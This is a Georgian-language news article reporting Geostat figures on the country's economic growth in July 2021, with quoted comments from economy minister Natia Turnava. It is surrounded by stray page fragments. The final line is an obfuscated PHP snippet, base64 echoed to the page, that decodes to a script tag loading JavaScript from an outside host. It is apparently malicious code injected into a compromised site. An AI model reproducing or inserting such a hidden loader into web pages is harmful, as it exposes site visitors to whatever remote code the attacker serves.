celsiusi
ავერსი საქკაბელი
საქსტატის მონაცემებით, 2021 წლის ივლისში გასული წლის ანალოგიურ პერიოდთან შედარებით ქვეყნის ეკონომიკა 9.9%-ით გაიზარდა, ხოლო 7 თვეში ზრდის ტემპმა 12.2% შეადგინა. ეკონომიკის მინისტრ ნათია თურნავას შეფასებით, ამას რამდენიმე განმაპირობებელი ფაქტორი აქვს მათ შორისაა ვაქცინაციის ტემპი და ბიზნესსექტორში სტაბილურობის განცდა.
 
„რომ დავაჯამოთ, 7 თვის (იანვარ-ივლისში) მონაცემებით, გასული წლის ანალოგიურ პერიოდთან შედარებით ეკონომიკა თითქმის 6%-ით არის გაზრდილი 2019 წლის 7 თვესთან შედარებით. ეს ნიშნავს იმას, რომ კვლავინდებურად ეკონომიკის გაჯანსაღება, განვითარება გრძელდება. ეს კიდევ ერთხელ გვაძლევს რწმენას, რომ წლის ბოლომდე ეკონომიკური ზრდის საკმაოდ კარგი მაჩვენებელი გვექნება და ვვარაუდობთ, ორნიშნა ზრდას.
 
დარგობრივად რომ შევხედოთ, თითქმის ყველა დარგში პოზიტიური დინამიკაა. განსაკუთრებით ზრდის ტემპით გადამამუშავებელი მრეწველობა ლიდერობს. ასევე, განთავსების და სტუმარ-მასპინძლობის ინდუსტრია და ვაჭრობა. მნიშვნელოვანი მამოძრავებელი ძალა ეკონომიკური ზრდის არის ადგილობრივი ექსპორტი, რომელიც თითქმის 50%-ით არის გაზრდილი, რაც ძალიან მნიშვნელოვანია. ეს დაკავშირებულია იმასთან, რომ ბიზნესებს მომავლის იმედი და სტაბილურობის განცდა გაუჩნდათ; დიდი მონდომებით ახორციელებენ ახალ ინვესტიციებს, ახალ კონტრაქტებს დებენ, ექსპორტის და ვაჭრობის არეალს აფართოებენ, ასევე წარმოებების გაფართოება და გადაიარაღებები ხდება.
 
დადებითია ვაქცინაციის მაჩვენებელი, რომელიც ასეთი მაღალი ტემპით მიმდინარეობს, ჩვენ დღეში შესაძლებლობა გვაქვს, რომ 40 000 ადამიანი აიცრას, ესეც მომავლის პერსპექტივის განცდას ქმნის”, - განაცხადა თურნავამ.
1119
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");